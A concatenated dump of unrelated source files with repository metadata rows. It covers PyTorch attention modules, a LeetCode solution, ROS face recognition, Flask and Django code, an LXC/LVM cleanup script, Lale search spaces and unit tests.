self.conv_du = nn.Sequential(
nn.Conv2d(channel, channel // reduction,1, bias=False),
nn.ReLU(inplace=True),
nn.Conv2d(channel // reduction, channel,1,bias=False),
nn.Sigmoid()
)
def forward(self, x):
b, c, _, _ = x.size()
y = self.avg_pool(x)
y = self.conv_du(y)
return x * y
class SELayer(nn.Module):
def __init__(self, channel, reduction=16):
super(SELayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Linear(channel, channel // reduction, bias=False),
nn.ReLU(inplace=True),
nn.Linear(channel // reduction, channel, bias=False),
nn.Sigmoid()
)
def forward(self, x):
b, c, _, _ = x.size()
y = self.avg_pool(x).view(b, c)
y = self.fc(y).view(b, c, 1, 1)
return x * y.expand_as(x)
## Residual Channel Attention Block (RCAB)
class RCAB(nn.Module):
def __init__(
self, n_feat, kernel_size, reduction,
bias=True, bn=False, act=nn.ReLU(True), res_scale=1):
super(RCAB, self).__init__()
modules_body = []
# import pdb
# pdb.set_trace()
for i in range(2):
modules_body.append(nn.Conv2d(n_feat, n_feat, kernel_size, bias=bias))
if bn: modules_body.append(nn.BatchNorm2d(n_feat))
if i == 0: modules_body.append(act)
modules_body.append(CALayer(n_feat, reduction))
self.body = nn.Sequential(*modules_body)
self.res_scale = res_scale
def forward(self, x):
# import pdb
# pdb.set_trace()
res = self.body(x)
#res = self.body(x).mul(self.res_scale)
res += x
return res
class CAM_Module(nn.Module):
""" Channel attention module"""
def __init__(self):
super(CAM_Module, self).__init__()
# self.channel_in = in_dim
self.gamma = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=-1)
def forward(self,x):
"""
inputs :
x : input feature maps( B X C X H X W)
returns :
out : attention value + input feature
attention: B X C X C
"""
m_batchsize, C, height, width = x.size()
proj_query = x.view(m_batchsize, C, -1)
proj_key = x.view(m_batchsize, C, -1).permute(0, 2, 1)
energy = torch.bmm(proj_query, proj_key)
energy_new = torch.max(energy, -1, keepdim=True)[0].expand_as(energy)-energy
attention = self.softmax(energy_new)
proj_value = x.view(m_batchsize, C, -1)
out = torch.bmm(attention, proj_value)
out = out.view(m_batchsize, C, height, width)
out = self.gamma*out + x
return out,attention
| [
"noreply@github.com"
] | noreply@github.com |
dfabe356284d91b7abe48701e4cb31e026728bd1 | e8d719fe45dfbff9cbbc4ed872832cec6cabaca6 | /307_Range_Sum_Query_Mutable_TLE.py | 09a96706fa016fe861dd7404e808a7fa4a7d89a3 | [] | no_license | nlfox/leetcode | 64f4f48d7f4be6df0542e51cc7037df40bf184a3 | d61363f99de3d591ebc8cd94f62544a31a026d55 | refs/heads/master | 2020-12-21T01:43:01.792899 | 2016-11-14T23:10:12 | 2016-11-14T23:10:12 | 56,680,839 | 2 | 0 | null | 2016-05-17T17:16:37 | 2016-04-20T11:19:58 | Python | UTF-8 | Python | false | false | 1,088 | py | class NumArray(object):
def __init__(self, nums):
"""
initialize your data structure here.
:type nums: List[int]
"""
self.nums = nums
self.len = len(nums)
self.d = []
last = 0
for i in nums:
self.d.append(last)
last += i
self.d.append(last)
def update(self, i, val):
"""
:type i: int
:type val: int
:rtype: int
"""
self.nums[i] = val
last = self.d[i]
for j in xrange(i+1, self.len + 1):
last += self.nums[j - 1]
self.d[j] = last
def sumRange(self, i, j):
"""
sum of elements nums[i..j], inclusive.
:type i: int
:type j: int
:rtype: int
"""
return self.d[j + 1] - self.d[i]
# Your NumArray object will be instantiated and called as such:
numArray = NumArray([9, -8])
print numArray.update(0, 3)
print numArray.sumRange(1, 1)
print numArray.sumRange(0, 1)
print numArray.update(1, -3)
print numArray.sumRange(0, 1)
| [
"nlfox@msn.cn"
] | nlfox@msn.cn |
f9d41e644050b1e8ccffbcfc55ed36679fc061d4 | 54e406e685c0f78d1cd8d88a0107428729296d1c | /Who装配/member_test.py | 5aa320b6fb8246f9eecdda8d60d5f140151d5ccb | [] | no_license | Kate-Lin/who_is_who | 9ce656fae6910854cad69533669c41e658c530d5 | 420901819197ee18879d025fa07d8bb9c1e676df | refs/heads/master | 2020-09-24T01:40:20.379241 | 2019-12-08T09:06:25 | 2019-12-08T09:06:25 | 225,631,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,030 | py | #! /usr/bin/env python
#coded by Lin Shen, 20190513
#########################################
#import modules needed
import os
import rospy
from geometry_msgs.msg import PoseStamped
from std_msgs.msg import String,Int16
import tf
import tf2_ros
from sound_play.libsoundplay import SoundClient
import sys
import freenect
import cv2
import numpy as np
from PIL import Image
import time
import math
from std_srvs.srv import Empty
import actionlib
import actionlib_msgs.msg
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal, MoveBaseResult
from geometry_msgs.msg import Pose, Point, Quaternion
from beginner_tutorials.msg import PeoplePose
import shutil
from cv2 import cv as cv
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
class Remember_Member:
def __init__(self):
self.path = '/home/ros/robocup/src/beginner_tutorials/launch/member'
rospy.loginfo("In the __init__()")
self.recognizer = cv2.createLBPHFaceRecognizer()
self.face_cascade=cv2.CascadeClassifier('/usr/share/opencv/haarcascades/haarcascade_frontalface_alt.xml')
self.frame = ''
self.face_rects = ''
self.load_path = '/home/ros/robocup/src/beginner_tutorials/launch/train_member/member.yml'
shutil.copyfile('/home/ros/robocup/src/beginner_tutorials/launch/WhoIsWho_yaml/trainningdata.yml',self.load_path)
self.train()
self.recognize()
def getIMagesWithID(self, path):
imagePaths = [os.path.join(path,f) for f in os.listdir(path)]
faces = []
IDs = []
for imagePath in imagePaths:
faceImg = Image.open(imagePath).convert('L')
faceNp = np.array(faceImg, 'uint8')
ID = int(os.path.split(imagePath)[-1].split('.')[1])
faces.append(faceNp)
IDs.append(ID)
cv2.waitKey(10)
return IDs, faces
def train(self):
for i in range(1,101):
img_path = self.path + "/" + str(i) + ".jpg"
print img_path
self.frame = cv2.imread(img_path)
#cv2.imshow('face',self.frame)
gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY)
self.face_rects = self.face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in self.face_rects:
face = self.frame[y:y+h-w*0.07,x+w*0.15:x+w-w*0.15]
cv2.imwrite("/home/ros/robocup/src/beginner_tutorials/launch/member_faces/user."+str(i)+".jpg",face)
#cv2.imshow('FaceDetector',self.frame)
path = '/home/ros/robocup/src/beginner_tutorials/launch/member_faces'
Ids, faces = self.getIMagesWithID(path)
self.recognizer.train(faces,np.array(Ids))
self.recognizer.save(self.load_path)
cv2.destroyAllWindows()
def recognize(self):
self.recognizer.load(self.load_path)
frame = cv2.imread(self.path+'/18.jpg')
self.frame = cv2.resize(frame, None,fx=1.0,fy=1.0,interpolation=cv2.INTER_AREA)
gray = cv2.cvtColor(self.frame, cv2.COLOR_BGR2GRAY)
faces = self.face_cascade.detectMultiScale(gray,1.3,5)
for (x,y,w,h) in faces:
ids,conf = self.recognizer.predict(gray[y:y+h-w*0.07,x+w*0.15:x+w-w*0.15])
cv2.rectangle(self.frame,(x,y),(x+w,y+h),(0,255,0),1)
print ids,conf
if __name__ == "__main__":
Remember_Member() | [
"oncwnuLedn4TbGotWjICLQETNKDk@git.weixin.qq.com"
] | oncwnuLedn4TbGotWjICLQETNKDk@git.weixin.qq.com |
585d43a1a1ba55b36a4a4fb310dc1ec619374015 | 884b78b9bdc19200cae87e532fa6458a92def273 | /tk_test.py | a352191428c86b270ef587da27db1795e78280cc | [] | no_license | andermic/cousins | 78bd68bf630c003ab21dfb110b3684615fbc0489 | 980f5a3ac50bb3f4847c1d02e5f74c97f9f8c5eb | refs/heads/master | 2016-09-16T15:57:18.053704 | 2015-01-19T15:26:55 | 2015-01-19T15:26:55 | 7,281,208 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | #! /usr/bin/python
from Tkinter import *
class MyApp:
def __init__(self, parent):
self.parent = parent
self.f1 = Frame(parent)
self.f1.pack()
self.b1 = Button(self.f1, text='click', bg='blue')
self.b1.pack(side=LEFT)
self.b1.bind('<Button-1>', self.b1_left_click)
self.b1.bind('<Return>', self.b1_left_click)
self.b2 = Button(self.f1, text='goodbye!', background='red')
self.b2.pack(side=LEFT)
self.b2.bind('<Button-2>', self.b2_right_click)
def b1_left_click(self, event):
self.b1['text'] = self.b1['text'] + 'click'
def b2_right_click(self, event):
self.parent.destroy()
root = Tk()
myapp = MyApp(root)
root.mainloop()
| [
"ptolemy777@gmail.com"
] | ptolemy777@gmail.com |
820aed6c6cda925ce81e6dcae90fc907ee2f0393 | 905d9f4b94a1b198b29cfd7f347a847471ef92b1 | /core/authentication.py | c95893727c638455d2864f7e48b3e0f41b38252a | [] | no_license | prixite/backend-template | 8addd6d38c2ecce92aaf8225c75e1eab00c802eb | ca0676eae35c507a6b51abeff04fc2bf430bccde | refs/heads/master | 2023-06-11T03:08:55.462576 | 2021-07-03T09:07:36 | 2021-07-03T09:07:36 | 379,807,726 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | from rest_framework import authentication
class TokenAuthentication(authentication.TokenAuthentication):
    """DRF token authentication that expects ``Authorization: Bearer <token>``
    instead of the default ``Token <token>`` header prefix."""
    keyword = 'Bearer'
| [
"umair.waheed@gmail.com"
] | umair.waheed@gmail.com |
36052de6dd45ad86930ea87779a2ffd46de82b96 | 28a78bf095125a1202842225c2d7512079017a02 | /argorithm/2884_re.py | 35e05cb9fef74bc98182ae9affe95a92feff041a | [] | no_license | sunyeongchoi/sydsyd_challenge | d322451a82c63b05097d44ee3b9fc4492645e204 | 93dd250e96b91f50215a61a3b5913a523f074445 | refs/heads/master | 2023-05-25T00:57:58.651494 | 2023-05-18T01:43:00 | 2023-05-18T01:43:00 | 293,253,085 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | H, M = map(int, input().split())
if M >= 45:
print(H, M-45)
else:
if H == 0:
H = 24
print(H-1, (60+M)-45) | [
"sn0716@naver.com"
] | sn0716@naver.com |
6e35f494ebe7c070ad17b73bbe9ec7029e8c0f99 | 2a2d5458160bbec34bb1be7c53dde620d293d818 | /cheb.py | 16bb696a1ba5e9e9e3fb947666bd05bcc8764fb1 | [] | no_license | dowoncha/Mathematics | bf4eeb490e77e53f70abc2671524aefbbf7a9a60 | 948e1f5e8cbe76f564e35ea1dc34b665d6bf5208 | refs/heads/master | 2020-06-20T11:47:03.158869 | 2016-11-27T19:36:37 | 2016-11-27T19:36:37 | 74,867,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | from numpy import polynomial as P
if __name__ == "__main__":
p = P.Polynomial([1, -1.0/2, -1.0/8, -3.0/24, -15.0/384, -165.0/3840])
print p
c = p.convert(kind=P.Chebyshev)
print c
print c.basis(3)
| [
"dowoncha@live.unc.edu"
] | dowoncha@live.unc.edu |
22425d8ae6d33997675bb88ca7f2f42436dcf5c9 | 071ccc8d8eeb9983824d61c740c5476c59dbdc88 | /app.py | e15da6bf3a4e9937978f75220e7051cc27fbe63d | [] | no_license | dewizdumb/SQLAlchemy | d2aaa0c617f95264acc23b3ea152b0cb6a62d194 | 8075fb8ef9ed8ccbd4a8cb7735477ac577f55254 | refs/heads/master | 2020-07-22T03:08:02.736484 | 2019-09-29T07:07:42 | 2019-09-29T07:07:42 | 207,056,497 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,613 | py | from flask import Flask , jsonify
import sqlalchemy
from sqlalchemy import create_engine, func
from sqlalchemy.orm import Session
from sqlalchemy.ext.automap import automap_base
import datetime as dt
from sqlalchemy.orm import scoped_session, sessionmaker
#############################################
# Database Setup
#############################################
# Reflect the existing SQLite schema into mapped classes (no models defined
# by hand): tables 'measurement' and 'station'.
engine = create_engine("sqlite:///Resources/hawaii.sqlite",echo=False)
Base = automap_base()
Base.prepare(engine, reflect=True)
Measurement = Base.classes.measurement
Station = Base.classes.station
# Thread-local session so each Flask request gets its own session object.
session = scoped_session(sessionmaker(bind=engine))
# Most recent observation date in the dataset (dates are ISO strings,
# so lexical DESC ordering matches chronological ordering).
last_date = session.query(
    Measurement.date
).order_by(
    Measurement.date.desc()
).first()[0]
last_date = dt.datetime.strptime(last_date,"%Y-%m-%d")
# Start of the trailing one-year window used by several routes below.
first_date = last_date - dt.timedelta(days = 365)
############################################
# Flask Setup
############################################
app = Flask(__name__)
############################################
# Flask Routes
############################################
@app.route("/")
def welcome():
    """Landing page: list every available API route as simple HTML text.

    Adjacent f-strings concatenate into one string, so this returns a
    single HTML fragment, not a tuple.
    """
    return (
        f"Available Routes for Flask Server:<br/>"
        f"-----------------------------------------<br/>"
        f"<br/>"
        f"The dates and temperature observations from the last year:<br/>"
        f"/api/v1.0/precipitation<br/>"
        f"-----------------------------------------<br/>"
        f"<br/>"
        f"List of stations from the dataset:<br/>"
        f"/api/v1.0/stations<br/>"
        f"-----------------------------------------<br/>"
        f"<br/>"
        f"List of Temperature Observations (tobs) for the previous year:<br/>"
        f"/api/v1.0/tobs<br/>"
        f"-----------------------------------------<br/>"
        f"<br/>"
        f"List of the minimum temperature, the average temperature, and the max temperature for given date (ie- June 1, 2017:<br/>"
        f"Replace 'start' with YYYY-MM-DD</br>"
        f"/api/v1.0/start<br/>"
        f"-----------------------------------------<br/>"
        f"<br/>"
        f"List of the minimum temperature, the average temperature, and the max temperature for a given start and end date (ie- June 1 - 10, 2017):<br/>"
        f"Replace 'start/end' with YYYY-MM-DD/YYYY-MM-DD</br>"
        f"/api/v1.0/start/end<br/>"
        f"-----------------------------------------<br/>"
        f"<br/>"
    )
@app.route("/api/v1.0/precipitation")
def precipitation():
    """Return {date: precipitation} for the trailing year of data as JSON."""
    rows = (
        session.query(Measurement.date, Measurement.prcp)
        .filter(Measurement.date > first_date)
        .order_by(Measurement.date)
        .all()
    )
    # Each row is a (date, prcp) pair, so dict() builds the mapping directly.
    return jsonify({'Data': dict(rows)})
@app.route("/api/v1.0/stations")
def stations():
    """Return every weather station and its metadata as JSON."""
    station_records = [
        {
            'Station': record.station,
            "Station Name": record.name,
            "Latitude": record.latitude,
            "Longitude": record.longitude,
            "Elevation": record.elevation,
        }
        for record in session.query(Station).all()
    ]
    return jsonify({'Data': station_records})
@app.route("/api/v1.0/tobs")
def tobs():
    """Return station, date and temperature observations for the last year."""
    observations = (
        session.query(Measurement.tobs, Measurement.date, Measurement.station)
        .filter(Measurement.date > first_date)
        .all()
    )
    readings = [
        {'Station': row.station, 'Date': row.date, 'Temp': row.tobs}
        for row in observations
    ]
    return jsonify({'Data': readings})
@app.route("/api/v1.0/<start>")
def start_temp(start=None):
    """Return min/avg/max temperature over all dates on or after ``start``.

    ``start`` is a YYYY-MM-DD date string taken from the URL path.
    """
    start_temps = session.query(
        func.min(Measurement.tobs),
        func.avg(Measurement.tobs),
        func.max(Measurement.tobs)
    ).filter(
        Measurement.date >= start
    ).all()
    start_list = list()
    for tmin, tavg, tmax in start_temps:
        # BUG FIX: the labels were swapped -- "Max Temp" used to receive the
        # average and "Avg Temp" the maximum.
        start_dict = {}
        start_dict["Min Temp"] = tmin
        start_dict["Avg Temp"] = tavg
        start_dict["Max Temp"] = tmax
        start_list.append(start_dict)
    return jsonify ({'Data':start_list})
@app.route("/api/v1.0/<start>/<end>")
def calc_temps(start=None,end=None):
    """Return min/avg/max temperature between ``start`` and ``end`` inclusive.

    Both URL parts are YYYY-MM-DD date strings.
    """
    aggregates = (
        session.query(
            func.min(Measurement.tobs),
            func.avg(Measurement.tobs),
            func.max(Measurement.tobs),
        )
        .filter(Measurement.date >= start, Measurement.date <= end)
        .all()
    )
    summary = [
        {"Min Temp": tmin, "Avg Temp": tavg, "Max Temp": tmax}
        for tmin, tavg, tmax in aggregates
    ]
    return jsonify ({'Data': summary})
if __name__ == '__main__':
    # Flask development server only -- not suitable for production.
    app.run(debug=True)
"dewizdumb@gmail.com"
] | dewizdumb@gmail.com |
546e8f3fe2ac890b2ad0e6c2249cd2e0ec0a27ed | c4c20c4c7653da52249dac4d9ced3ffcbcb2c299 | /aidooit_access_point/migrations/0002_aidooitaccesspoint_address.py | 2969a68765ae5b7b7748cbc2949a9d5d57913c8e | [] | no_license | rejamen/aidooit | 4ebccdba65b07da29f13273c474dd45ddd78968d | 31361307b70175d4e00ef4f7bbbb320ab7779551 | refs/heads/master | 2022-05-02T09:25:14.812540 | 2019-09-09T10:34:30 | 2019-09-09T10:34:30 | 191,284,990 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | # Generated by Django 2.2.4 on 2019-09-08 03:43
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the required ``address`` column to AidooitAccessPoint."""

    dependencies = [
        ('aidooit_access_point', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='aidooitaccesspoint',
            name='address',
            # default='' back-fills existing rows; preserve_default=False
            # keeps the default out of the final field definition.
            field=models.CharField(default='', max_length=300),
            preserve_default=False,
        ),
    ]
| [
"rejamen@gmail.com"
] | rejamen@gmail.com |
aa8118a8fbf2bd888e4917357eff53df4984fcfb | e5ce97f343b2617cce0396ebcfa3b9af70601393 | /lale/search/search_space.py | dd7406b30be41bbe8bb4af33119a2a8df40b3eed | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | kant/lale | c29f4be10ac7e36e0342b67cae26368381f0a3a1 | 972b4284775f1c2dfa8d1692381fdb0ddd1cfafe | refs/heads/master | 2020-07-01T09:46:53.848785 | 2019-08-07T16:30:56 | 2019-08-07T16:30:56 | 201,133,071 | 0 | 0 | Apache-2.0 | 2019-08-07T21:51:57 | 2019-08-07T21:51:57 | null | UTF-8 | Python | false | false | 4,657 | py | # Copyright 2019 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import logging
import numpy
from typing import Any, Dict, List, Set, Iterable, Iterator, Optional, Tuple, Union
from hyperopt import hp
from hyperopt.pyll import scope
from lale.util.VisitorMeta import AbstractVisitorMeta
from lale.search.PGO import FrequencyDistribution
logging.basicConfig(level=logging.WARNING)
logger = logging.getLogger(__name__)
PGO_input_type = Union[FrequencyDistribution, Iterable[Tuple[Any, int]], None]
class SearchSpace(metaclass=AbstractVisitorMeta):
    """Abstract base class for hyperparameter search-space nodes.

    The metaclass wires up visitor-pattern dispatch for subclasses.
    """
    def __init__(self):
        pass
class SearchSpaceEnum(SearchSpace):
    """A categorical search dimension over a fixed set of values."""
    # Optional profile-guided-optimization prior over ``vals``.
    pgo:Optional[FrequencyDistribution]
    # Candidate values, sorted by string form for deterministic ordering.
    vals:List[Any]
    def __init__(self, vals:Iterable[Any], pgo:PGO_input_type=None):
        """vals: the candidate values; pgo: optional prior given either as a
        pre-built FrequencyDistribution or as raw (value, count) pairs."""
        super(SearchSpaceEnum, self).__init__()
        self.vals = sorted(vals, key=str)
        if pgo is None or isinstance(pgo, FrequencyDistribution):
            self.pgo = pgo
        else:
            # Raw (value, count) pairs: align them with the sorted vals.
            self.pgo = FrequencyDistribution.asEnumValues(pgo, self.vals)
class SearchSpaceConstant(SearchSpaceEnum):
    """A degenerate enum dimension holding exactly one value."""
    def __init__(self, v, pgo:PGO_input_type=None):
        super(SearchSpaceConstant, self).__init__([v], pgo=pgo)
class SearchSpaceBool(SearchSpaceEnum):
    """A boolean search dimension (enum over True/False)."""
    def __init__(self, pgo:PGO_input_type=None):
        super(SearchSpaceBool, self).__init__([True, False], pgo=pgo)
class SearchSpaceNumber(SearchSpace):
    """A numeric search dimension, continuous or discrete, with optional
    (possibly exclusive) bounds and an optional PGO prior."""
    minimum:Optional[float]
    # NOTE(review): fixed annotation-name typo (was 'exclusiveMinumum'),
    # matching the attribute actually assigned in __init__.
    exclusiveMinimum:bool
    maximum:Optional[float]
    exclusiveMaximum:bool
    discrete:bool
    distribution:str
    pgo:Optional[FrequencyDistribution]
    def __init__(self,
                 minimum=None,
                 exclusiveMinimum:bool=False,
                 maximum=None,
                 exclusiveMaximum:bool=False,
                 discrete:bool=False,
                 distribution="uniform",
                 pgo:PGO_input_type=None) -> None:
        """distribution: name of the sampling distribution (default "uniform");
        pgo: optional prior, raw counts or a pre-built FrequencyDistribution."""
        super(SearchSpaceNumber, self).__init__()
        self.minimum = minimum
        self.exclusiveMinimum = exclusiveMinimum
        self.maximum = maximum
        self.exclusiveMaximum = exclusiveMaximum
        self.distribution = distribution
        self.discrete = discrete
        if pgo is None or isinstance(pgo, FrequencyDistribution):
            self.pgo = pgo
        else:
            # Convert raw counts, clipping to the inclusive bounds.
            if discrete:
                self.pgo = FrequencyDistribution.asIntegerValues(pgo, inclusive_min=self.getInclusiveMin(), inclusive_max=self.getInclusiveMax())
            else:
                self.pgo = FrequencyDistribution.asFloatValues(pgo, inclusive_min=self.getInclusiveMin(), inclusive_max=self.getInclusiveMax())
    def getInclusiveMax(self):
        """ Return the maximum as an inclusive maximum (exclusive maxima are adjusted accordingly)
        """
        # NOTE(review): assumes self.maximum is not None when exclusive.
        max = self.maximum
        if self.exclusiveMaximum:
            if self.discrete:
                max = max - 1
            else:
                # Largest representable float strictly below the bound.
                max = numpy.nextafter(max, float('-inf'))
        return max
    def getInclusiveMin(self):
        """ Return the minimum as an inclusive minimum (exclusive minima are adjusted accordingly)
        """
        min = self.minimum
        if self.exclusiveMinimum:
            if self.discrete:
                min = min + 1
            else:
                # Smallest representable float strictly above the bound.
                min = numpy.nextafter(min, float('+inf'))
        return min
class SearchSpaceArray(SearchSpace):
    """A variable-length array (or tuple) dimension whose items all share
    the same sub-space ``contents``; length ranges minimum..maximum."""
    def __init__(self, minimum:int=0, *, maximum:int, contents:SearchSpace, is_tuple=False) -> None:
        super(SearchSpaceArray, self).__init__()
        self.minimum = minimum
        self.maximum = maximum
        self.contents = contents
        self.is_tuple = is_tuple
class SearchSpaceList(SearchSpace):
    """A fixed-length heterogeneous list (or tuple) dimension: one sub-space
    per position."""
    def __init__(self, contents:List[SearchSpace], is_tuple=False) -> None:
        super(SearchSpaceList, self).__init__()
        self.contents = contents
        self.is_tuple = is_tuple
class SearchSpaceObject(SearchSpace):
    """A structured dimension: named keys with a set of alternative choices,
    each choice supplying one sub-space per key."""
    def __init__(self, longName:str, keys:List[str], choices:Iterable[Any]) -> None:
        super(SearchSpaceObject, self).__init__()
        self.longName = longName
        self.keys = keys
        self.choices = choices
| [
"kakate@us.ibm.com"
] | kakate@us.ibm.com |
0d31c01c1720c23342929252c36a87159a44e0d6 | ddc619da476d90bb0099a556114eedb1f93379e2 | /dateandtime.py | 509bf529027a9558e128ddafb35b2965f1da28d2 | [] | no_license | akshunive/My-sanddunes | a54a8a288262a8b2cc5d762cadca79160f949305 | 9f9f6734fdb99b46e10925682b8dc76b70627b01 | refs/heads/master | 2021-01-20T18:19:58.768886 | 2016-08-07T14:09:20 | 2016-08-07T14:09:20 | 65,136,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | #to print the date and time of the system now
import datetime
print datetime.datetime.now()
| [
"noreply@github.com"
] | noreply@github.com |
2cd95fd2f36e95c2f5317974b9ce2f58a79cf559 | 3f44f32ad6cd51076f32fe7b6c7c06c06c0b4219 | /delete_all_runway_containers.py | 9749bb06e68af4e6d3ced3bee076bc8407451a2e | [
"Apache-2.0"
] | permissive | matthewoliver/runway | b2316ea4e2fd4454b15a44da355bbd141b5b8853 | e675a36f3156d24268cae196b97c3a6a4a54c355 | refs/heads/master | 2020-04-06T04:04:10.392226 | 2017-02-26T02:04:19 | 2017-02-26T02:04:19 | 83,061,068 | 0 | 0 | null | 2017-02-24T16:28:48 | 2017-02-24T16:28:48 | null | UTF-8 | Python | false | false | 2,231 | py | #!/usr/bin/env python3
# do lxc list --format=json swift-runway
# ...and delete them
# while it would be cool if this worked, it doesn't and the docs are bad
# https://linuxcontainers.org/lxc/documentation/#python
# import lxc
# for defined in (True, False):
# for active in (True, False):
# x = lxc.list_containers(active=active, defined=defined)
# print(x, '=> lxc.list_containers(active=%s, defined=%s)' % (active, defined))
import json
import subprocess
import shlex
import os
import sys
import shutil
# lxc and lvremove both need root privileges.
if os.geteuid() != 0:
    print('must be run as root')
    sys.exit(1)
# LVM volume group that backs the runway containers.
VOLUME_GROUP = 'swift-runway-vg01'
# --- delete all swift-runway-* LXC containers ---
list_command = 'lxc list --format=json'
p = subprocess.run(shlex.split(list_command), stdout=subprocess.PIPE)
containers = json.loads(p.stdout.decode())
to_delete = [x['name'] for x in containers if x['name'].startswith('swift-runway-')]
if to_delete:
    delete_command = 'lxc delete --force %s' % ' '.join(to_delete)
    p = subprocess.run(shlex.split(delete_command))
    print('%d containers deleted' % len(to_delete))
else:
    print('No containers to delete')
# delete associated lvm volumes
try:
    lvlist = os.listdir('/dev/%s' % VOLUME_GROUP)
except FileNotFoundError:
    print('No volumes to delete')
else:
    for logical_volume in lvlist:
        delete_command = 'lvremove --yes /dev/%s/%s' % (VOLUME_GROUP, logical_volume)
        p = subprocess.run(shlex.split(delete_command), stdout=subprocess.PIPE)
    # for/else: no break above, so the summary always prints after the loop.
    else:
        print('%d volumes deleted' % len(lvlist))
# delete associated lxc profiles
profile_list_command = 'lxc profile list'
p = subprocess.run(shlex.split(profile_list_command), stdout=subprocess.PIPE)
profiles = p.stdout.decode().split('\n')
# NOTE(review): 'lxc profile list' prints a table; rows may not begin with
# the bare profile name -- confirm this prefix match works as intended.
to_delete = [x for x in profiles if x.startswith('swift-runway-')]
if to_delete:
    for profile in to_delete:
        delete_command = 'lxc profile delete %s' % profile
        p = subprocess.run(shlex.split(delete_command))
    # NOTE(review): 'profles' typo in the user-facing messages (left as-is).
    print('%d profles deleted' % len(to_delete))
else:
    print('No profles to delete')
# delete container working spaces
for dirname in os.listdir('guest_workspaces'):
    if dirname == 'README':
        continue
    dirname = 'guest_workspaces/' + dirname
    shutil.rmtree(dirname)
] | me@not.mn |
e6d2396b1679238553cf86553f1d2cbe848c4b65 | b8c4ef9ccab22717ab97ab2fb100614d962a5820 | /src/test/python/com/skalicky/python/interviewpuzzles/test_find_all_concatenated_words_in_dictionary.py | 31250fe2c29509af0bab7db00e4be68e00a269b3 | [] | no_license | Sandeep8447/interview_puzzles | 1d6c8e05f106c8d5c4c412a9f304cb118fcc90f4 | a3c1158fe70ed239f8548ace8d1443a431b644c8 | refs/heads/master | 2023-09-02T21:39:32.747747 | 2021-10-30T11:56:57 | 2021-10-30T11:56:57 | 422,867,683 | 0 | 0 | null | 2021-10-30T11:56:58 | 2021-10-30T11:55:17 | null | UTF-8 | Python | false | false | 1,397 | py | from unittest import TestCase
from src.main.python.com.skalicky.python.interviewpuzzles.find_all_concatenated_words_in_dictionary import Solution
class TestSolution(TestCase):
    """Unit tests for Solution.find_all_concatenated_words_in_dictionary."""
    def test_find_all_concatenated_words_in_dictionary__when_input_contains_words_of_same_length__then_output_is_empty(
            self):
        # No word can be built from shorter ones when all lengths are equal.
        self.assertSetEqual(set(), Solution.find_all_concatenated_words_in_dictionary({'cat', 'dog', 'eat'}))
    def test_find_all_concatenated_words_in_dictionary__when_input_contains_multiple_concatenated_words_of_2_other_words__then_these_words_are_in_output(
            self):
        self.assertSetEqual({'techlead', 'catsdog'}, Solution.find_all_concatenated_words_in_dictionary(
            {'tech', 'lead', 'techlead', 'cat', 'cats', 'dog', 'catsdog'}))
    def test_find_all_concatenated_words_in_dictionary__when_input_contains_concatenated_word_of_3_other_words__then_this_word_is_in_output(
            self):
        self.assertSetEqual({'catsdog'}, Solution.find_all_concatenated_words_in_dictionary(
            {'cat', 's', 'dog', 'catsdog'}))
    def test_find_all_concatenated_words_in_dictionary__when_input_contains_word_concatenated_by_multiple_ways__then_this_word_is_in_output(
            self):
        # 'cats' = cat+s and 'catsdog' decomposes as cats+dog or cat+s+dog.
        self.assertSetEqual({'cats', 'catsdog'}, Solution.find_all_concatenated_words_in_dictionary(
            {'cat', 'cats', 's', 'dog', 'catsdog'}))
| [
"skalicky.tomas@gmail.com"
] | skalicky.tomas@gmail.com |
58ff279f7975147898d053677c3a180603ba4691 | b46c205f1c1c9cb53632987869afd05f2997bad8 | /setup.py | 6f08483129f5fcfadc91af15b9545fb04c5bad1f | [] | no_license | mohitRohatgi/easy21 | 33e3dd1648fd07264f513a452adee25669ce87c2 | 95683027124ef05fa2f8e072b3450ef8f9972383 | refs/heads/master | 2021-04-12T07:48:46.776583 | 2017-06-19T15:39:13 | 2017-06-19T15:39:13 | 94,510,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 160 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 15 19:38:57 2017
@author: m0r00ds
"""
here = os.path.dirname(os.path.abspath(__file__)) | [
"mohit.rohatgi@walmart.com"
] | mohit.rohatgi@walmart.com |
e21bbef8a9afa0ae7bab88d6245d993fc2a30213 | 1608bb10acd691eed6927cd27b98f9d5d6f5fbeb | /nodes/trainers.py | 66059b1c90bc92ec85526f65b71768b561299bba | [] | no_license | FiveRAge/speech | 85591d6420205496f40bb6d6e8f4ea7584a459a8 | 22a34093bfe5483c11da55d30b50051eab4ce52c | refs/heads/master | 2020-04-05T03:36:46.816787 | 2018-11-07T09:35:04 | 2018-11-07T09:35:04 | 156,521,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,825 | py | # -*- coding: utf-8 -*-
import os
from threading import Thread, Semaphore
from chatterbot.conversation import Response
from chatterbot.trainers import ListTrainer
from openpyxl import load_workbook
